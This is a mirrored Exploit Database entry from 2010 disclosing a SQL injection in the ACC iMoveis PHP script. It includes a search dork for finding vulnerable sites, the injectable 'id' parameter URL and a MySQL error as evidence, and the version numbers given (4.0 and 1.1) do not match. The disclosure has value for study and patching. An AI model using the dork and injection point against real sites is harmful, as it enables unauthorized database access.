ACC IMoveis 4.0 – SQL Injection

Exploit Database
15 阅读

作者： EraGoN

日期： 2010-10-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15338/

# Exploit Title : iMoveis SQL Injection Vulnerability
# Date : 26/10/2010
# Author : EraGoN
# Software link : http://baixar7.com/download/acc-imoveis-script-php.rar/3d1e7bf4b9
# Version : 1.1
# Tested on : Linux / Windows XP


# Dork :

inurl:imoveis.php?id=

#Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server

version for the right syntax to use near '20'' at line 1

#Vuln :

http://www.site.org/imoveis.php?id=20


**Proud to be Muslim
**Proud to be Albanian
**www.eragon.ws

Contact : eragon@legends.ag


[ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ]
[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ]

last Exploits
ACC IMoveis 4.0 – SQL Injection的更多信息

Church Management System 1.0 – ‘search’ SQL Injection (Unauthenticated)：
Mantis Bug Tracker 2.3.0 – Remote Code Execution (Unauthenticated)：
Best POS Management System v1.0 – Unauthenticated Remote Code Execution：
Itech Dating Script 3.26 – SQL Injection：
AKY Blog – SQL Injection：
All In One Control Panel 1.4.1 – ‘cp_menu_data_file.php’ SQL Injection：
WordPress Plugin Foxypress – ‘Uploadify.php’ Arbitrary Code Execution (Metasploit)：
Delta Sql 1.8.2 – Arbitrary File Upload：